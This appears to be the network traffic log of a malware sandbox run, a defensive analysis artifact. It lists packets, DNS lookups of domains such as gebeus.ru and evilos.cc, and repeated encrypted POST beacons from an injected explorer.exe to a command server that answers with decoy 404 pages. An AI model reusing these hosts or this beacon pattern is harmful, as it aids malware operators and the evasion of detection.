                                              Jul 23, 2024 06:17:45.281717062 CEST4975080192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:45.286659002 CEST804975058.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:49.302114010 CEST4975180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:49.307931900 CEST804975158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:49.308151960 CEST4975180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:49.311870098 CEST4975180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:49.311871052 CEST4975180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:49.317621946 CEST804975158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:49.317662954 CEST804975158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:51.625567913 CEST804975158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:51.625618935 CEST804975158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:51.625922918 CEST4975180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:51.637293100 CEST4975180192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:51.642602921 CEST804975158.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:55.791785002 CEST4975280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:55.797311068 CEST804975258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:55.797527075 CEST4975280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:55.797616959 CEST4975280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:55.797616959 CEST4975280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:55.802963972 CEST804975258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:55.803004026 CEST804975258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:58.200817108 CEST804975258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:58.200911999 CEST804975258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:17:58.201071978 CEST4975280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:58.201386929 CEST4975280192.168.2.558.151.148.90
                                              Jul 23, 2024 06:17:58.206484079 CEST804975258.151.148.90192.168.2.5
                                              Jul 23, 2024 06:18:04.854029894 CEST4975380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:04.859357119 CEST8049753211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:04.859570980 CEST4975380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:04.859649897 CEST4975380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:04.859673977 CEST4975380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:04.865009069 CEST8049753211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:04.865153074 CEST8049753211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:06.304620981 CEST8049753211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:06.304717064 CEST8049753211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:06.304898024 CEST4975380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:06.305013895 CEST4975380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:06.310358047 CEST8049753211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:10.412949085 CEST4975480192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:10.418559074 CEST8049754211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:10.418749094 CEST4975480192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:10.418839931 CEST4975480192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:10.418840885 CEST4975480192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:10.424257994 CEST8049754211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:10.424304008 CEST8049754211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:11.844388008 CEST8049754211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:11.844537020 CEST8049754211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:11.844748974 CEST4975480192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:11.844749928 CEST4975480192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:11.850641966 CEST8049754211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:15.978883982 CEST4975580192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:15.984354973 CEST8049755211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:15.984446049 CEST4975580192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:15.984659910 CEST4975580192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:15.984709024 CEST4975580192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:15.989964962 CEST8049755211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:15.990009069 CEST8049755211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:17.462402105 CEST8049755211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:17.462997913 CEST8049755211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:17.463068008 CEST4975580192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:17.463110924 CEST4975580192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:17.468231916 CEST8049755211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:21.929168940 CEST4975680192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:21.934340954 CEST8049756211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:21.934437037 CEST4975680192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:21.934712887 CEST4975680192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:21.934712887 CEST4975680192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:21.940391064 CEST8049756211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:21.940431118 CEST8049756211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:23.369680882 CEST8049756211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:23.369731903 CEST8049756211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:23.370040894 CEST4975680192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:23.370040894 CEST4975680192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:23.375479937 CEST8049756211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:27.270433903 CEST4975780192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:27.276057005 CEST8049757211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:27.276175022 CEST4975780192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:27.276273966 CEST4975780192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:27.276299000 CEST4975780192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:27.281657934 CEST8049757211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:27.281699896 CEST8049757211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:28.737255096 CEST8049757211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:28.737301111 CEST8049757211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:28.737355947 CEST4975780192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:28.737479925 CEST4975780192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:28.742347956 CEST8049757211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:32.925316095 CEST4975880192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:32.930867910 CEST8049758211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:32.930977106 CEST4975880192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:32.931145906 CEST4975880192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:32.931184053 CEST4975880192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:32.936386108 CEST8049758211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:32.936429024 CEST8049758211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:34.351037025 CEST8049758211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:34.351176977 CEST8049758211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:34.351264000 CEST4975880192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:34.351264954 CEST4975880192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:34.356698990 CEST8049758211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:38.396564960 CEST4975980192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:38.402750015 CEST8049759211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:38.402884007 CEST4975980192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:38.403007984 CEST4975980192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:38.403043032 CEST4975980192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:38.408629894 CEST8049759211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:38.408921003 CEST8049759211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:39.869865894 CEST8049759211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:39.870325089 CEST8049759211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:39.870518923 CEST4975980192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:39.870520115 CEST4975980192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:39.875870943 CEST8049759211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:44.144598007 CEST4976080192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:44.150002003 CEST8049760211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:44.150259972 CEST4976080192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:44.150259972 CEST4976080192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:44.150346994 CEST4976080192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:44.155635118 CEST8049760211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:44.155702114 CEST8049760211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:45.619739056 CEST8049760211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:45.620404959 CEST8049760211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:45.620613098 CEST4976080192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:45.620613098 CEST4976080192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:45.625525951 CEST8049760211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:45.833270073 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:45.833384991 CEST49748443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:45.835598946 CEST49748443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:45.835627079 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:45.835688114 CEST49748443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:45.835699081 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:45.836697102 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:45.836850882 CEST49748443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:45.880580902 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:46.836998940 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:46.837157011 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:46.837225914 CEST49748443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:46.852495909 CEST49748443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:46.852541924 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:46.852576017 CEST49748443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:46.852595091 CEST44349748167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:46.957179070 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:46.957293987 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:46.957386017 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:46.958117962 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:46.958194971 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:47.596033096 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:47.596117973 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:47.598948002 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:47.599000931 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:47.599061966 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:47.599075079 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:47.599510908 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:47.600368023 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:47.600415945 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:48.829001904 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:48.829087973 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:48.829163074 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:48.845087051 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:48.845087051 CEST49761443192.168.2.5107.173.160.137
                                              Jul 23, 2024 06:18:48.845149994 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:48.845191956 CEST44349761107.173.160.137192.168.2.5
                                              Jul 23, 2024 06:18:48.957055092 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:48.957143068 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:48.957231998 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:48.957602978 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:48.957643032 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:49.577560902 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:49.577759027 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:49.580085993 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:49.580115080 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:49.580218077 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:49.580229998 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:49.580646992 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:49.580846071 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:49.580874920 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:49.745321035 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:49.750754118 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:49.752039909 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:49.752041101 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:49.752130032 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:49.757325888 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:49.757368088 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:51.831773043 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:51.831816912 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:51.831845999 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:51.831940889 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:51.832031012 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:51.832031012 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:51.832031012 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:51.832043886 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:51.832223892 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:51.832367897 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:51.832551956 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:51.833492994 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:51.833678961 CEST4976380192.168.2.5211.202.224.10
                                              Jul 23, 2024 06:18:51.838218927 CEST8049763211.202.224.10192.168.2.5
                                              Jul 23, 2024 06:18:51.848164082 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:51.848213911 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:51.848246098 CEST49762443192.168.2.5107.173.160.139
                                              Jul 23, 2024 06:18:51.848261118 CEST44349762107.173.160.139192.168.2.5
                                              Jul 23, 2024 06:18:51.956957102 CEST49764443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:51.956983089 CEST44349764167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:51.957052946 CEST49764443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:51.957576036 CEST49764443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:51.957587957 CEST44349764167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:52.640048981 CEST44349764167.235.128.153192.168.2.5
                                              Jul 23, 2024 06:18:52.640127897 CEST49764443192.168.2.5167.235.128.153
                                              Jul 23, 2024 06:18:52.642608881 CEST49764443192.168.2.5167.235.128.153
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Jul 23, 2024 06:15:24.178445101 CEST | 192.168.2.5 | 1.1.1.1 | 0x9920 | Standard query (0) | evilos.cc | A (IP address) | IN (0x0001) | false
                                              Jul 23, 2024 06:15:25.197494984 CEST | 192.168.2.5 | 1.1.1.1 | 0x9920 | Standard query (0) | evilos.cc | A (IP address) | IN (0x0001) | false
                                              Jul 23, 2024 06:15:27.318972111 CEST | 192.168.2.5 | 1.1.1.1 | 0x476c | Standard query (0) | gebeus.ru | A (IP address) | IN (0x0001) | false
                                              Jul 23, 2024 06:15:28.331592083 CEST | 192.168.2.5 | 1.1.1.1 | 0x476c | Standard query (0) | gebeus.ru | A (IP address) | IN (0x0001) | false
                                              Jul 23, 2024 06:15:29.347157001 CEST | 192.168.2.5 | 1.1.1.1 | 0x476c | Standard query (0) | gebeus.ru | A (IP address) | IN (0x0001) | false
                                              Jul 23, 2024 06:16:24.212255001 CEST | 192.168.2.5 | 1.1.1.1 | 0x9c92 | Standard query (0) | mussangroup.com | A (IP address) | IN (0x0001) | false
                                              Jul 23, 2024 06:18:02.852278948 CEST | 192.168.2.5 | 1.1.1.1 | 0x3c49 | Standard query (0) | gebeus.ru | A (IP address) | IN (0x0001) | false
                                              Jul 23, 2024 06:18:03.853648901 CEST | 192.168.2.5 | 1.1.1.1 | 0x3c49 | Standard query (0) | gebeus.ru | A (IP address) | IN (0x0001) | false
                                              Jul 23, 2024 06:18:04.847419977 CEST | 192.168.2.5 | 1.1.1.1 | 0x3c49 | Standard query (0) | gebeus.ru | A (IP address) | IN (0x0001) | false
                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              0 | 192.168.2.5 | 49710 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:31.205391884 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://psrjxmmdjkgukbst.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 184
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:32.761040926 CEST | 152 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:32 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Raw: 04 00 00 00 72 e8 85 ea
                                              Data Ascii: r


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              1 | 192.168.2.5 | 49711 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:32.775747061 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://nwahwjhjnhccg.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 291
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:34.276123047 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:33 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              2 | 192.168.2.5 | 49712 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:34.286669016 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://xnykmijsuyh.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 201
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:35.836056948 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:35 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.5 | 49713 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:35.871789932 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://orusljfrmtwk.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 115
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:37.370142937 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:37 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              4 | 192.168.2.5 | 49714 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:37.378664017 CEST | 280 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://gpbmggcpxwmve.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 164
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:37.378684044 CEST | 164 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 3b 25 a5 91
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu;%SCd''<G5.;/vg&zT@A]u<]/E
                                              Jul 23, 2024 06:15:38.858997107 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:38 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              5 | 192.168.2.5 | 49715 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:38.868074894 CEST | 279 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://rgmwogluhxcw.net/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 335
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:38.868119955 CEST | 335 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 78 54 b2 a3
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vuxTMoF9Mt4hT.BJi.UDo,^@zOALXs6X(j51\*H. vgB}7\qu>`J)
                                              Jul 23, 2024 06:15:40.423437119 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:40 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              6 | 192.168.2.5 | 49716 | 58.151.148.90 | 80 | 1028 | C:\Windows\explorer.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 23, 2024 06:15:40.446508884 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                              Connection: Keep-Alive
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept: */*
                                              Referer: http://bnbjwqelfrqfgfg.org/
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                              Content-Length: 266
                                              Host: gebeus.ru
                                              Jul 23, 2024 06:15:40.446522951 CEST | 266 | OUT | Data Raw: 3b 6e 51 14 86 b8 68 2e a9 dc c3 01 02 74 7b b8 0c 0b cc e7 69 74 9e 63 01 7d 7e 92 37 c0 c2 6d 9b 56 ce 5f 72 1e 20 1d 9a 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 3d 40 ab 9a
                                              Data Ascii: ;nQh.t{itc}~7mV_r ?#1|J7 M@NA -[k,vu=@IkF6Pt1(!+[CwkQYP*wJ<1dpF,{s^U`KtIjE+/+X~AAm`D>"Ad
                                              Jul 23, 2024 06:15:41.965888023 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                              Server: nginx/1.26.0
                                              Date: Tue, 23 Jul 2024 04:15:41 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Connection: close
